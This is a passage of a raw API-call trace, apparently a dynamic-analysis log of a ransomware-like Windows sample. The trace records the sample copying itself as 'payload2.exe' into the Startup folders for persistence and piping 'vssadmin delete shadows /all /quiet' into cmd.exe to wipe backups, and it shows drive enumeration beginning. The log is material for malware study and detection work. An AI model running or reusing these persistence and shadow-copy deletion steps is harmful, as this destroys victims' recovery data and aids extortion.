(lpModuleName="kernel32.dll") returned 0x76c20000 [0033.577] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.577] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0033.577] lstrlenW (lpString="kernel32.dll") returned 12 [0033.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ab0 | out: hHeap=0x600000) returned 1 [0033.577] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635a60 | out: hHeap=0x600000) returned 1 [0033.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0033.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0033.578] ReadFile (in: hFile=0xe4, lpBuffer=0x2060020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2060020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0033.590] WriteFile (in: hFile=0xe8, lpBuffer=0x2060020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2060020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0033.592] ReadFile (in: hFile=0xe4, lpBuffer=0x2060020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2060020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0033.592] CloseHandle (hObject=0xe8) returned 1 [0033.593] CloseHandle (hObject=0xe4) returned 1 [0033.593] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.593] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635a60 [0033.593] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.593] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635ab0 [0033.594] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.594] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.594] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0033.594] lstrlenW (lpString="kernel32.dll") returned 12 [0033.594] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ab0 | out: hHeap=0x600000) returned 1 [0033.594] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.594] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635a60 | out: hHeap=0x600000) returned 1 [0033.594] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x2060020 | out: hHeap=0x600000) returned 1 [0033.600] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x65d5b8 [0033.600] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x66d5c0 [0033.600] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.600] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635a60 [0033.600] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635a60, Size=0x40) returned 0x636bb8 [0033.600] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636bb8, Size=0x80) returned 0x65b5d0 [0033.600] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x637d30 [0033.600] lstrlenW (lpString="") returned 0 [0033.600] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0033.600] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8c) returned 0x637e38 [0033.600] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0033.600] RegQueryValueExW (in: hKey=0xe4, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x66d5c0, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x78) returned 0x0 [0033.600] RegCloseKey (hKey=0xe4) returned 0x0 [0033.600] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x637e38 | out: hHeap=0x600000) returned 1 [0033.600] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0033.600] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0033.600] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x637d30 | out: hHeap=0x600000) returned 1 [0033.600] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe", lpDst=0x65d5b8, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 0x7f [0033.600] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x66d5c0 | out: hHeap=0x600000) returned 1 [0033.600] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65d5b8 | out: hHeap=0x600000) returned 1 [0033.600] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x2060020 [0033.601] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.601] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635a60 [0033.601] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.601] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635ab0 [0033.601] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.601] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.601] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0033.601] lstrlenW (lpString="kernel32.dll") returned 12 [0033.601] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635a60 | out: hHeap=0x600000) returned 1 [0033.601] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.601] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ab0 | out: hHeap=0x600000) returned 1 [0033.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0033.601] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0033.603] ReadFile (in: hFile=0xe4, lpBuffer=0x2060020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2060020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0033.617] WriteFile (in: hFile=0xe8, lpBuffer=0x2060020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2060020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0033.620] ReadFile (in: hFile=0xe4, lpBuffer=0x2060020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2060020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0033.620] CloseHandle (hObject=0xe8) returned 1 [0033.621] CloseHandle (hObject=0xe4) returned 1 [0033.621] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.621] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635ab0 [0033.621] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.621] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635a60 [0033.621] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.621] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.621] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0033.621] lstrlenW (lpString="kernel32.dll") returned 12 [0033.621] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635a60 | out: hHeap=0x600000) returned 1 [0033.621] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.621] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ab0 | out: hHeap=0x600000) returned 1 [0033.622] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x2060020 | out: hHeap=0x600000) returned 1 [0033.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63b5a8 | out: hHeap=0x600000) returned 1 [0033.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64b5b0 | out: hHeap=0x600000) returned 1 [0033.627] lstrlenW (lpString="%windir%\\System32") returned 17 [0033.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x636b28 | out: hHeap=0x600000) returned 1 [0033.627] lstrlenW (lpString="%appdata%") returned 9 [0033.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614518 | out: hHeap=0x600000) returned 1 [0033.627] lstrlenW (lpString="%sh(Startup)%") returned 13 [0033.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6144f0 | out: hHeap=0x600000) returned 1 [0033.627] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0033.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x636b70 | out: hHeap=0x600000) returned 1 [0033.627] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.627] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x6144f0 [0033.627] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144f0, Size=0x40) returned 0x636b70 [0033.628] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636b70, Size=0x80) returned 0x65b5d0 [0033.628] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.628] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x6144f0 [0033.628] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1fffc) returned 0x63b5a8 [0033.628] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x65d5b8 [0033.628] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x66d5c0 [0033.628] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.628] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x614518 [0033.628] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614518, Size=0x40) returned 0x636b70 [0033.628] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636b70, Size=0x80) returned 0x65b658 [0033.628] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b658, Size=0x100) returned 0x637d30 [0033.628] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0033.628] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x637d30 | out: hHeap=0x600000) returned 1 [0033.628] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x65d5b8, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0033.628] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x66d5c0 | out: hHeap=0x600000) returned 1 [0033.628] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65d5b8 | out: hHeap=0x600000) returned 1 [0033.628] CreatePipe (in: hReadPipe=0x18fd58, hWritePipe=0x18fd5c, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fd58*=0xe8, hWritePipe=0x18fd5c*=0xec) returned 1 [0033.629] CreatePipe (in: hReadPipe=0x18fdc8, hWritePipe=0x18fdcc, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fdc8*=0xf0, hWritePipe=0x18fdcc*=0xf4) returned 1 [0033.629] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0033.629] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0033.629] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fd68*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4), lpProcessInformation=0x18fdb8 | out: lpCommandLine=0x0, lpProcessInformation=0x18fdb8*(hProcess=0xfc, hThread=0xf8, dwProcessId=0x9b4, dwThreadId=0x9b8)) returned 1 [0033.655] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0033.656] WriteFile (in: hFile=0xec, lpBuffer=0x65b5d0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18fd64, lpOverlapped=0x0 | out: lpBuffer=0x65b5d0*, lpNumberOfBytesWritten=0x18fd64*=0x41, lpOverlapped=0x0) returned 1 [0033.656] CloseHandle (hObject=0xfc) returned 1 [0033.656] CloseHandle (hObject=0xf8) returned 1 [0033.656] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63b5a8 | out: hHeap=0x600000) returned 1 [0033.656] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0033.656] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b5d0 | out: hHeap=0x600000) returned 1 [0033.656] lstrlenW (lpString="%comspec%") returned 9 [0033.656] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6144f0 | out: hHeap=0x600000) returned 1 [0033.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0033.656] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x634bb0 [0033.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x634bb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0033.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x614928 [0033.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x614928, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0033.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bc8 [0033.657] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bc8, Size=0x20) returned 0x6144f0 [0033.657] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144f0, Size=0x40) returned 0x636b70 [0033.657] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0033.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xd0) returned 0x637da8 [0033.657] GetLogicalDrives () returned 0x4 [0033.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10014) returned 0x63b5a8 [0033.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bc8 [0033.657] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bc8, Size=0x20) returned 0x6144f0 [0033.657] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144f0, Size=0x40) returned 0x636c00 [0033.657] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636c00, Size=0x80) returned 0x65b5d0 [0033.657] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x639318 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x639318, Size=0x200) returned 0x639318 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x639318, Size=0x400) returned 0x639318 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x639318, Size=0x800) returned 0x639930 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x639930, Size=0x1000) returned 0x64b5c8 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x65d5b8 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bc8 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x634ca0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x6148d0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x634cb8 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x6148e0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634cd0 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6148e0, Size=0x8) returned 0x6148e0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634ce8 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6148e0, Size=0x10) returned 0x614898 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634d00 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634d18 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614898, Size=0x20) returned 0x637c30 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634d30 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6148e0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x634d48 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x634d60 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x637c30, Size=0x40) returned 0x635458 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x634d78 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x634d90 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x634da8 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x634dc0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634dd8 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634df0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6354a0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634e08 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635458, Size=0x80) returned 0x639318 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634e20 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634e38 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634e50 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634e68 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639948 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x639960 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639978 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x614898 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639990 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x6399a8 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x6399c0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x6399d8 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x6399f0 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639a08 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x639a20 [0033.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639a38 [0033.658] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x639318, Size=0x100) returned 0x639318 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639a50 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639a68 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639a80 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x639a98 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639ab0 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639ac8 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6148a8 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639ae0 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639af8 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639b10 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x637c30 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639b28 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639b40 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x637c40 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639b58 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639b70 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x639b88 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639ba0 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639bb8 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639bd0 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x639be8 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639c00 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x639c18 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639c30 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639c48 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639c60 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639c78 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x637c50 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639c90 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639ca8 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639cc0 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639cd8 [0033.659] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x639318, Size=0x200) returned 0x639318 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639cf0 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x635458 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639d08 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639d48 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639d60 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639d78 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639d90 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639da8 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639dc0 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639dd8 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639df0 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, 